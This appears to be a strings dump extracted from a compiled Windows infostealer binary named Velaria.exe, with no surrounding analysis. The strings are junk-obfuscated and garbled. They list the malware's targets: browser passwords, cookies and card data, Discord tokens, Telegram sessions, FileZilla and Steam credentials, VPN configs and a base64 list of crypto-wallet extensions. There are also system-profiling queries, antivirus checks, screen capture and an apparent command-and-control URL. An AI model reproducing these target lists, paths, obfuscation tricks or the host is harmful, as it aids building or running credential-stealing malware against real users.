Cz0KUyAPOj4nPlYUKCcLHCI2PVM9EjhfLwYgTg==
IwMvGw4xNTALAygZPCQIGg9RNgk=
Fimbles
Yandex\YaAddon
ToString
*wallet*
string.Replace
%USERPFile.WriteROFILE%\AppFile.WriteData\RoamiFile.Writeng
File.Write
Handler
%USERPserviceInterface.ExtensionROFILE%\ApserviceInterface.ExtensionpData\LocaserviceInterface.Extensionl
serviceInterface.Extension
ProldCharotonVoldCharPN
oldChar
nSystem.CollectionspvoSystem.Collections*
System.Collections
UNIQUE
Height
CopyFromScreen
http://zuu.drovtov.ru/
kerKKKKOOOOnel3KKKKOOOO2
useIntPtrr32.dlIntPtrl
IntPtr
GbooletConboolsoleWiboolndoboolw
ShintowWiintndintow
SELSystem.Windows.FormsECT * FRSystem.Windows.FormsOM WinSystem.Windows.Forms32_ProcSystem.Windows.Formsessor
System.Windows.Forms
NumberOfCores
roSystem.Linqot\CISystem.LinqMV2
System.Linq
SELSystem.LinqECT * FRSystem.LinqOM WinSystem.Linq32_VideoCoSystem.Linqntroller
AdapterRAM
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Clients\StartMenuInternet
shell\open\command
Unknown Version
SELESystem.ManagementCT * FRSystem.ManagementOM WiSystem.Managementn32_DisSystem.ManagementkDrivSystem.Managemente
System.Management
SerialNumber
SELSystem.Text.RegularExpressionsECT * FRSystem.Text.RegularExpressionsOM Win32_PSystem.Text.RegularExpressionsrocess WSystem.Text.RegularExpressionshere SessSystem.Text.RegularExpressionsionId='
FileSystem
SSystem.ELECT * FRSystem.OM WiSystem.n32_ProcSystem.ess WherSystem.e SessiSystem.onId='
System.
ExecutablePath
Concat0 MConcatb oConcatr Concat0
Concat
SELEMemoryCT * FMemoryROM WiMemoryn32_OperMemoryatingSMemoryystem
Memory
{0}{1}{2}
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Unknown
String
Replace
@autofillexpiraas21tion_yas21ear
ProfilesTotal of RAM%USERPEnvironmentROFILE%\AppDEnvironmentata\RoaEnvironmentming
AppData\Local\
[^\u0020-\u007F]UNKNOWN
Local State
ProcessId
name_on_card1*.1l1d1b
Profile_encrypted_value
%appdata%\
logins
{0}\FileZilla\recentservers.xml
%appdata%\discord\Local Storage\leveldb
\tdata
MB or
[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
profiles\Windows\
expiras21ation_moas21nth
user.config
{0}\FileZilla\sitemanager.xml
cookies.sqlite
UnknownExtension\Program Files (x86)\
config
displayName
host_keyNametdata
SELECT * FROM
expires_utc
\Program Data\
coMANGOokies.sqMANGOliteAFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct
*ssfn*
DisplayVersion
%localappdata%\
-*.lo--gLocalPrefs.json
OpHandlerenVPHandlerN ConHandlernect%DSK_23%cmd
Opera GXcookies
//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeROOT\SecurityCenter
ROOT\SecurityCenter2Web DataSteamPath
waasflleasft.datasf
CommandLine
\Telegram Desktop\tdata
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Cookies
TotalVisibleMemorySize
is_secure
Software\Valve\SteamLogin Data
ID: isSecureegram.exe
NoDefrdDefVPNDefwaasflletasfv11
ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZu
Opera GX Stable
nameProfile_Unknown
card_number_encrypted
, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext
//settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueLocal Extension SettingsNWinordVWinpn.eWinxe*Winhostmoz_cookies
User Data
windows-1251, CommandLine:
DisplayName
expiry
*.vstring.Replacedf
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
Velaria.exe
LegalCopyright
OriginalFilename
Velaria.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0